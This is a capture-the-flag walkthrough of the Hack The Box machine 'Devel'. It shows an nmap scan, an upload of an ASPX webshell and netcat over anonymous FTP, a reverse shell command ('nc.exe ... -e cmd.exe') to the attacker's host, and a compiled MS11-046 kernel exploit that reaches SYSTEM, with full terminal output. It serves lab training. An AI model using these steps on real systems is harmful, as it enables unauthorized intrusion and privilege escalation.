Devel
Contents
Ports scan
root@kali:~/HTB/Machines/Devel# nmap -A -T4 -v -oN nmap.txt devel # Nmap 7.80 scan initiated Thu Nov 14 08:47:20 2019 as: nmap -A -T4 -v -oN nmap.txt devel Nmap scan report for devel (10.10.10.5) Host is up (0.044s latency). rDNS record for 10.10.10.5: devel.htb Not shown: 998 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 01:06AM <DIR> aspnet_client | 03-17-17 04:37PM 689 iisstart.htm |_03-17-17 04:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 0.378 days (since Wed Nov 13 23:43:29 2019) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 21/tcp) HOP RTT ADDRESS 1 44.49 ms 10.10.14.1 2 44.63 ms devel.htb (10.10.10.5)
Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Nov 14 08:47:38 2019 -- 1 IP address (1 host up) scanned in 18.12 seconds
Ftp & web server
The web server seems to be the startup page of IIS.
We push a file to the ftp server.
root@kali:~/HTB/Machines/Devel# cat hello.html <html>Hello I am in</html> root@kali:~/HTB/Machines/Devel# ftp devel Connected to devel.htb. 220 Microsoft FTP Service Name (devel:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put hello.html local: hello.html remote: hello.html 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 28 bytes sent in 0.00 secs (379.7743 kB/s) ftp> ls 200 PORT command successful. 125 Data connection already open; Transfer starting. 03-18-17 01:06AM <DIR> aspnet_client 11-18-19 12:03AM 28 hello.html 03-17-17 04:37PM 689 iisstart.htm 03-17-17 04:37PM 184946 welcome.png 226 Transfer complete. ftp> quit 221 Goodbye.
And we check we see it on the web server.
Push a webshell
root@kali:~/HTB/Machines/Devel# cp /usr/share/webshells/aspx/cmdasp.aspx ./ root@kali:~/HTB/Machines/Devel# ftp devel Connected to devel.htb. 220 Microsoft FTP Service Name (devel:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put cmdasp.aspx local: cmdasp.aspx remote: cmdasp.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 1442 bytes sent in 0.00 secs (11.0903 MB/s) ftp> quit 221 Goodbye.
We can execute commands from the web shell.
Full reverse shell
Download nc for windows
root@kali:~/HTB/Machines/Devel# wget https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip --2019-11-14 11:31:01-- https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip Resolving eternallybored.org (eternallybored.org)... 84.255.206.8, 2a01:260:4094:1:42:42:42:42 Connecting to eternallybored.org (eternallybored.org)|84.255.206.8|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 111892 (109K) [application/zip] Saving to: ‘netcat-win32-1.12.zip’ netcat-win32-1.12.z 100%[==================>] 109.27K 241KB/s in 0.5s 2019-11-14 11:31:02 (241 KB/s) - ‘netcat-win32-1.12.zip’ saved [111892/111892]
Unzip the file
root@kali:~/HTB/Machines/Devel# unzip -d netcat netcat-win32-1.12.zip Archive: netcat-win32-1.12.zip inflating: netcat/doexec.c inflating: netcat/getopt.c inflating: netcat/netcat.c inflating: netcat/generic.h inflating: netcat/getopt.h inflating: netcat/hobbit.txt inflating: netcat/license.txt inflating: netcat/readme.txt inflating: netcat/Makefile inflating: netcat/nc.exe inflating: netcat/nc64.exe root@kali:~/HTB/Machines/Devel# cp netcat/nc.exe ./
Push nc to the server
root@kali:~/HTB/Machines/Devel# ftp devel Connected to devel.htb. 220 Microsoft FTP Service Name (devel:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put nc.exe local: nc.exe remote: nc.exe 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 65573 bytes sent in 0.09 secs (715.1759 kB/s) ftp> bye 221 Goodbye.
Run listener
root@kali:~/HTB/Machines/Devel# rlwrap nc -lnvp 5555 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::5555 Ncat: Listening on 0.0.0.0:5555
Initiate the reverse shell
Launch the following command from the webshell.
c:\inetpub\wwwroot\nc.exe 10.10.14.34 5555 -e cmd.exe
But it does not work, IIS is complaining "This program cannot be run in DOS mode"
The problem was the file was transferred in text mode instead of binary.
second transfer of nc.exe
root@kali:~/HTB/Machines/Devel# ftp devel Connected to devel.htb. 220 Microsoft FTP Service Name (devel:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> bin 200 Type set to I. ftp> put nc.exe local: nc.exe remote: nc.exe 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 38616 bytes sent in 0.00 secs (200.1472 MB/s) ftp> bye 221 Goodbye.
Initiate the reverse shell
Launch the following command from the webshell.
c:\inetpub\wwwroot\nc.exe 10.10.14.34 5555 -e cmd.exe
This time it works!
root@kali:~/HTB/Machines/Devel# rlwrap nc -lnvp 5555 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::5555 Ncat: Listening on 0.0.0.0:5555 Ncat: Connection from 10.10.10.5. Ncat: Connection from 10.10.10.5:49167. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>whoami whoami iis apppool\web
Reverse shell with Insmoniashell
I used this reverse shell, because I didn't know that the issue was the transfer mode of nc.exe.
Download Insomniashell
root@kali:~/HTB/Machines/Devel# wget https://www.darknet.org.uk/content/files/InsomniaShell.zip --2019-11-14 13:32:23-- https://www.darknet.org.uk/content/files/InsomniaShell.zip Resolving www.darknet.org.uk (www.darknet.org.uk)... 45.79.65.87 Connecting to www.darknet.org.uk (www.darknet.org.uk)|45.79.65.87|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 8902 (8.7K) [application/zip] Saving to: ‘InsomniaShell.zip’ InsomniaShell.zip 100%[==================>] 8.69K --.-KB/s in 0s 2019-11-14 13:32:23 (58.5 MB/s) - ‘InsomniaShell.zip’ saved [8902/8902]
Push Insomniashell to the server
root@kali:~/HTB/Machines/Devel# ftp devel Connected to devel.htb. 220 Microsoft FTP Service Name (devel:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put InsomniaShell/InsomniaShell.aspx InsomniaShell.aspx local: InsomniaShell/InsomniaShell.aspx remote: InsomniaShell.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 45580 bytes sent in 0.09 secs (504.3878 kB/s) ftp> bye 221 Goodbye.
Run the reverse shell
On the listening console, the reverse shell is opened.
root@kali:~/HTB/Machines/Devel# rlwrap nc -lnvp 5555 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::5555 Ncat: Listening on 0.0.0.0:5555 Ncat: Connection from 10.10.10.5. Ncat: Connection from 10.10.10.5:49160. Shell enroute....... Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>
Privilege escalation
Windows 7 (6.1.7600 N/A Build 7600) without patch is vulnerable to MS11-046.
root@kali:~# searchsploit MS11-046
-------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------- ----------------------------------------
Microsoft Windows (x86) - 'afd.sys' L | exploits/windows_x86/local/40564.c
Microsoft Windows - 'afd.sys' Local K | exploits/windows/dos/18755.c
-------------------------------------- ----------------------------------------
Shellcodes: No Result
------------------------------- -----------------------------------------------
Paper Title | Path
| (/usr/share/exploitdb-papers/)
------------------------------- -----------------------------------------------
MS11-046 - Dissecting a 0day | docs/english/18712-ms11-046---dissecting-a-0da
------------------------------- -----------------------------------------------
compile the exploit
root@kali:~/HTB/Machines/Devel# cp /usr/share/exploitdb/exploits/windows_x86/local/40564.c ./ root@kali:~/HTB/Machines/Devel# i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32
upload the exploit to the server
root@kali:~/HTB/Machines/Devel# ftp devel Connected to devel.htb. 220 Microsoft FTP Service Name (devel:root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> bin 200 Type set to I. ftp> put MS11-046.exe local: MS11-046.exe remote: MS11-046.exe 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 345251 bytes sent in 0.48 secs (709.0281 kB/s) ftp> bye 221 Goodbye.
run the exploit
From the reverse shell
Ncat: Connection from 10.10.10.5.
Ncat: Connection from 10.10.10.5:49163.
Shell enroute.......
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>cd c:\inetpub\wwwroot
cd c:\inetpub\wwwroot
c:\inetpub\wwwroot>MS11-046.exe
MS11-046.exe
c:\Windows\System32>whoami
whoami
nt authority\system
User flag
c:\Windows\System32>cd ..
cd ..
c:\Windows>cd ..
cd ..
c:\>cd Users
cd Users
c:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users
18/03/2017 01:16 ▒▒ <DIR> .
18/03/2017 01:16 ▒▒ <DIR> ..
18/03/2017 01:16 ▒▒ <DIR> Administrator
17/03/2017 04:17 ▒▒ <DIR> babis
18/03/2017 01:06 ▒▒ <DIR> Classic .NET AppPool
18/11/2019 05:20 ▒▒ <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 24.569.319.424 bytes free
c:\Users>cd babis
cd babis
c:\Users\babis>cd Desktop
cd Desktop
c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
<USER FLAG>
Root Flag
c:\Users\babis\Desktop>cd ..
cd ..
c:\Users\babis>cd ..
cd ..
c:\Users>cd Administrator
cd Administrator
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
<ROOT FLAG>
c:\Users\Administrator\Desktop>exit
exit
[*] MS11-046 (CVE-2011-1249) x86 exploit
[*] by Tomislav Paskalev
[*] Identifying OS
[+] 32-bit
[+] Windows 7
[*] Locating required OS components
[+] ntkrnlpa.exe
[*] Address: 0x8284c000
[*] Offset: 0x007c0000
[+] HalDispatchTable
[*] Offset: 0x008e93b8
[+] NtQueryIntervalProfile
[*] Address: 0x77865510
[+] ZwDeviceIoControlFile
[*] Address: 0x77864ca0
[*] Setting up exploitation prerequisite
[*] Initialising Winsock DLL
[+] Done
[*] Creating socket
[+] Done
[*] Connecting to closed port
[+] Done
[*] Creating token stealing shellcode
[*] Shellcode assembled
[*] Allocating memory
[+] Address: 0x02070000
[*] Shellcode copied
[*] Exploiting vulnerability
[*] Sending AFD socket connect request
[+] Done
[*] Elevating privileges to SYSTEM
[+] Done
[*] Spawning shell
[*] Exiting SYSTEM shell
References
- NetCat for Windows
- InsomniaShell – ASP.NET Reverse Shell Or Bind Shell
- WindowsExploits/MS11-046
- Mingw-w64: How to compile Windows exploits on Kali Linux
Daniel Simao 08:52, 14 November 2019 (EST)
